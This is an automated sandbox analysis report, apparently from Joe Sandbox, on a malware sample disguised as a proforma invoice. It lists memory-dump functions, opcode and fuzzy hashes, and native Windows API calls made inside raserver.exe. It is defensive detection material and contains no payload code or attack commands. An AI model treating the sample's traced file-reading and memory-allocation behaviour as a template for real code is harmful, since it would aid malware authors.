Uniqueness Score: -1.00%

Function 00B29730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a11e6d0447efe6015d96fbc9eb02ff53700059b7b9541c3ce9c5347ba0a1f096
Instruction ID: 290fa06def626a91003a593546278443da983b294c684d2e4d3e1005fa77b707
Opcode Fuzzy Hash: a11e6d0447efe6015d96fbc9eb02ff53700059b7b9541c3ce9c5347ba0a1f096
Instruction Fuzzy Hash: EC90026261500402D240715D64187061055D7D0342FA1E065A0014554DC6998A75B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ec345bfae3c6a363fee69213e858bb98aefba079c0d1be36b25a6391094a6a
Instruction ID: 0dd06b7914351519ed67b431f230c8041dcf509795a5c8ccc5165a7299173593
Opcode Fuzzy Hash: b5ec345bfae3c6a363fee69213e858bb98aefba079c0d1be36b25a6391094a6a
Instruction Fuzzy Hash: 01900272311000529600A69D6804A4A5145D7F0342FA1E069A4004554C85948871A161

Uniqueness

Uniqueness Score: -1.00%

Function 00B29770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f48f57c97a444b563f287d88c4505766c81343393429cef215bc14213947cf5c
Instruction ID: 2109cb20a6316a0ba0b247393ac0bd44fffc2ca7b3b535fb89aecc23ebcec723
Opcode Fuzzy Hash: f48f57c97a444b563f287d88c4505766c81343393429cef215bc14213947cf5c
Instruction Fuzzy Hash: 5390026221504442D200655D6408A061045D7D0346FA1E065A1054595DC6758871F171

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe384c69401358f85d973d684ba12f7a09d86b444b7e493de38c70a0c089c7ee
Instruction ID: b205b52b1ffc358f23b4b899fba43cee391a2de4ba9e40e358620d45efc16cbe
Opcode Fuzzy Hash: fe384c69401358f85d973d684ba12f7a09d86b444b7e493de38c70a0c089c7ee
Instruction Fuzzy Hash: 9790027621504442D600655D6804A871045D7D0346FA1E465A041459CD86948871F161

Uniqueness

Uniqueness Score: -1.00%

Function 00B29760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76f5a5de3eaafe7265917552705f5841e8a67c3d4c416a8d6471713e53e4c6c
Instruction ID: b0e2814a3a8819ffba0fbe5c078dc14bf054a4f8d491cda900692d0150c3c173
Opcode Fuzzy Hash: d76f5a5de3eaafe7265917552705f5841e8a67c3d4c416a8d6471713e53e4c6c
Instruction Fuzzy Hash: FC90027221100403D200615D65087071045D7D0342FA1E465A0414558DD6968871B161

Uniqueness

Uniqueness Score: -1.00%

Function 00B29670, Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: f60f274503c1290faf374afeb7fee2ddd848ce98387211860c7b8ea57e4edcac
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00B7FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00B7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00b7fdda
0x00b7fde2
0x00b7fde5
0x00b7fdec
0x00b7fdfa
0x00b7fdff
0x00b7fe0a
0x00b7fe0f
0x00b7fe17
0x00b7fe1e
0x00b7fe19
0x00b7fe19
0x00b7fe19
0x00b7fe20
0x00b7fe21
0x00b7fe22
0x00b7fe25
0x00b7fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B7FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B7FE2B

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 653362fda4cc8f38d0ab6b6b9b53e66cd9c7120fb506563dbabbf7350f3198d7
Instruction ID: f84275a309a2982b76cfdee3fdaa71370431feed3af1d5abc9e03aeee4399d25
Opcode Fuzzy Hash: 653362fda4cc8f38d0ab6b6b9b53e66cd9c7120fb506563dbabbf7350f3198d7
Instruction Fuzzy Hash: E1F0C232200601BBD6241A55DC02F33BBAAEB84730F244255F628561E1DAA2BD2097F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: raserver.exe PID: 5888 Parent PID: 3424 raserver.exeCOMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	695
Total number of Limit Nodes:	81

Executed Functions

Function 00AC81BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00AC3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AC3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00AC820D

Strings

.z`, xrefs: 00AC81FD, 00AC8208

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: f672b9a320071fdfa861b6def53c8a7a6699effb6be05b2c7c4a6da72eb2ef14
Instruction ID: 178501246086ed507df63becbf078cb0f4b854365b672cb10c14ca9c1a05de54
Opcode Fuzzy Hash: f672b9a320071fdfa861b6def53c8a7a6699effb6be05b2c7c4a6da72eb2ef14
Instruction Fuzzy Hash: 69F0B2B2211108AFCB08CF88DC85EEB77A9BF8C754F158248FA0D97241DA30E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00AC3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AC3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00AC820D

Strings

.z`, xrefs: 00AC81FD, 00AC8208

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: c71c56a389551d68248827cd469d7b7253cb3f3a962b3a718f3a156a02901b99
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 14F0B6B2200108ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC8270, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(00AC3D52,5E972F59,FFFFFFFF,00AC3A11,?,?,00AC3D52,?,00AC3A11,FFFFFFFF,5E972F59,00AC3D52,?,00000000), ref: 00AC82B5

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 7cc6d8f944434e4cd5bd0448a93e8a54b6e0d175623b53ae71c783b9a738e115
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 23F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC839B, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AB2D11,00002000,00003000,00000004), ref: 00AC83D9

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5ce5c10e8e152209c28a0a877146405ff17887b3bdfab9ef05e8dcd4bf04d691
Instruction ID: e50cffd905913249692207989c10d77db4ff650428453afda4e18c412a9aafd9
Opcode Fuzzy Hash: 5ce5c10e8e152209c28a0a877146405ff17887b3bdfab9ef05e8dcd4bf04d691
Instruction Fuzzy Hash: 6BF015B6200218AFDB14DF99DC80EEB77ADFF98750F118659FA19A7241C630E911CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AB2D11,00002000,00003000,00000004), ref: 00AC83D9

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 0d38e98c9283f24a4c58bcf2b95c3bd64e1474f38ae0c0e67aaa75805525ae21
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 86F015B2200208ABCB14DF89CC81EAB77ADAF88750F118548FE0997241CA30F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC82F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00AC3D30,?,?,00AC3D30,00000000,FFFFFFFF), ref: 00AC8315

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 20933f5d41b7e6af103c00fa0422ca89c59778093815e0848f5b0a3341bd899c
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 93D01776200214ABD710EF98CC85FA77BACEF48760F154499BA199B282C930FA0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC82EB, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00AC3D30,?,?,00AC3D30,00000000,FFFFFFFF), ref: 00AC8315

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ca421b0c84a2ff3e447821fe86c2cb5ac84a654b401d82d8af0a0d04a1df588f
Instruction ID: a55824ba71c2d3cc28dbd4f65d8b59ef7e43e6a453b24037b90ef1d4302708ab
Opcode Fuzzy Hash: ca421b0c84a2ff3e447821fe86c2cb5ac84a654b401d82d8af0a0d04a1df588f
Instruction Fuzzy Hash: A0D02B5D50D3C04FC711EBF468D64C27F40EE511147140ECEE49907143D538D1099392

Uniqueness

Uniqueness Score: -1.00%

Function 04CF95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF95DA

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bcaeb363d531cfa0ef6a0c7917da863f67dda048f42328ed8c08ec8e50164214
Instruction ID: ce1a587c592fb7bd6ec40c51bba9de594e251f611a617274d854781a18b38c7a
Opcode Fuzzy Hash: bcaeb363d531cfa0ef6a0c7917da863f67dda048f42328ed8c08ec8e50164214
Instruction Fuzzy Hash: 459002A120200007A10571994414716401B97E4245B51C022E10056A4DC5A5D8D17169

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF954A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33056273259443e9091b409a39f24c0cf8abfc2d9f52fd4770535d891cf4ac8a
Instruction ID: ebb1dd668fd1788164fe0e09a5bda577ab47757efd408307d06e72fe7940090c
Opcode Fuzzy Hash: 33056273259443e9091b409a39f24c0cf8abfc2d9f52fd4770535d891cf4ac8a
Instruction Fuzzy Hash: 06900265211000076105A5990704607005797D9395351C022F1006664CD6A1D8A16165

Uniqueness

Uniqueness Score: -1.00%

Function 04CF96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF96DA

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7428e723c511f788e30f006c7cdabcc9413b0d40b2ab2e6b814bb5ab1250ff2b
Instruction ID: 805ad76f6c3501a42062d5b6905385a958e414651bbe5139ae04c0374b8d6fc2
Opcode Fuzzy Hash: 7428e723c511f788e30f006c7cdabcc9413b0d40b2ab2e6b814bb5ab1250ff2b
Instruction Fuzzy Hash: 5890027120100846F10061994404B46001697E4345F51C017A0115768D8695D8917565

Uniqueness

Uniqueness Score: -1.00%

Function 04CF96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF96EA

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55aa2f7816819375a30db33b845691d5b6ae06b2c499a7b19ba7d04ed010d1ad
Instruction ID: 52278df4656478870ec7208b15262ccb044f5c418b944650df8dfe5a9f456993
Opcode Fuzzy Hash: 55aa2f7816819375a30db33b845691d5b6ae06b2c499a7b19ba7d04ed010d1ad
Instruction Fuzzy Hash: 6D90027120108806F1106199840474A001697D4345F55C412A441576CD86D5D8D17165

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF965A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 16011c91a1e34817c787b2538482f40ad5dfe598187e2cca9e8caf5caa3b8040
Instruction ID: 009e6d07422807760addea35ab8d219b4e3a7560230acd86b31b347961997104
Opcode Fuzzy Hash: 16011c91a1e34817c787b2538482f40ad5dfe598187e2cca9e8caf5caa3b8040
Instruction Fuzzy Hash: 4B90027120504846F14071994404B46002697D4349F51C012A00557A8D96A5DD95B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF966A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 47d885e401bd3148c82d90bebf95971f1fc17a3b409418c9ae46353a7b312ca9
Instruction ID: 3d80e93c7ca89b81602360929abcffd465ccf4921c3d1aecb31ae3e6d8b2bc7c
Opcode Fuzzy Hash: 47d885e401bd3148c82d90bebf95971f1fc17a3b409418c9ae46353a7b312ca9
Instruction Fuzzy Hash: A990027120100806F1807199440474A001697D5345F91C016A0016768DCA95DA9977E5

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF9FEA

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4d789b0daeb7ff4a43c03c6112ef2291bffb38cd370e3fce9962e3cf950621c
Instruction ID: 07fbb49ff8e3873096f1f2f2e409de4609380057f32135f5aadfad6ac00a67f1
Opcode Fuzzy Hash: e4d789b0daeb7ff4a43c03c6112ef2291bffb38cd370e3fce9962e3cf950621c
Instruction Fuzzy Hash: 9690027131114406F11061998404706001697D5245F51C412A081566CD86D5D8D17166

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF978A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01c3f9717e6b4ffbc94bd999752a7e9959522c2a9b83c6313c1b6d661bc26594
Instruction ID: 21690e30322decc44e4f33f295f3ac3791af159454b732b540cf64470883b884
Opcode Fuzzy Hash: 01c3f9717e6b4ffbc94bd999752a7e9959522c2a9b83c6313c1b6d661bc26594
Instruction Fuzzy Hash: D390026921300006F1807199540870A001697D5246F91D416A000666CCC995D8A96365

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF971A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5e430dc7ef55e7cd05749fbc7afa0fe536cffec51f1eca2ee03a82cc53f41ce
Instruction ID: 775df9271f16e03f365ce0a99322568e373f6c0e3131a3a57a247b9d883bd1e2
Opcode Fuzzy Hash: a5e430dc7ef55e7cd05749fbc7afa0fe536cffec51f1eca2ee03a82cc53f41ce
Instruction Fuzzy Hash: 7590027120100406F10065D95408746001697E4345F51D012A5015669EC6E5D8D17175

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF984A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7df692fb93d2443af0f083a0e2c5a1e76c30b72bf20b7a337b4ba66d092cffbc
Instruction ID: 0ebca63977c531d354a385f242cf852602f3827a209daacc67762ab6c79fd8aa
Opcode Fuzzy Hash: 7df692fb93d2443af0f083a0e2c5a1e76c30b72bf20b7a337b4ba66d092cffbc
Instruction Fuzzy Hash: 1790026124204156B545B19944046074017A7E4285791C013A1405A64C85A6E896E665

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF986A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3623b66403353f226c43613dc21bb8935ca9e4ed3fee4f64b4dfb53209e414d
Instruction ID: 1f0172c313dc94f12bc86de3433c32dbe822cd12385ffe401ce48e6311a18d76
Opcode Fuzzy Hash: c3623b66403353f226c43613dc21bb8935ca9e4ed3fee4f64b4dfb53209e414d
Instruction Fuzzy Hash: B390027120100417F11161994504707001A97D4285F91C413A041566CD96D6D992B165

Uniqueness

Uniqueness Score: -1.00%

Function 04CF99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF99AA

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d87442fb97637ce62dd16b85bc481adaf591f1c86d218d297855c6fcf2e4cf44
Instruction ID: 6be81a873132a73f3dd069e1548a98218c609ff07d3b1e6b8133e8b8230fa2f9
Opcode Fuzzy Hash: d87442fb97637ce62dd16b85bc481adaf591f1c86d218d297855c6fcf2e4cf44
Instruction Fuzzy Hash: CD9002A134100446F10061994414B060016D7E5345F51C016E1055668D8699DC92716A

Uniqueness

Uniqueness Score: -1.00%

Function 04CF9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF991A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b0f3344f02348665a7c9ae1bbf5113bca5a98719b1516afd3c5230df4f7f7a1
Instruction ID: 3ff3b80c34af0c05e2ae33f088f79164fcfb2bd61f04a6fe73be01d352d2aa0b
Opcode Fuzzy Hash: 5b0f3344f02348665a7c9ae1bbf5113bca5a98719b1516afd3c5230df4f7f7a1
Instruction Fuzzy Hash: 9A9002B120100406F14071994404746001697D4345F51C012A5055668E86D9DDD576A9

Uniqueness

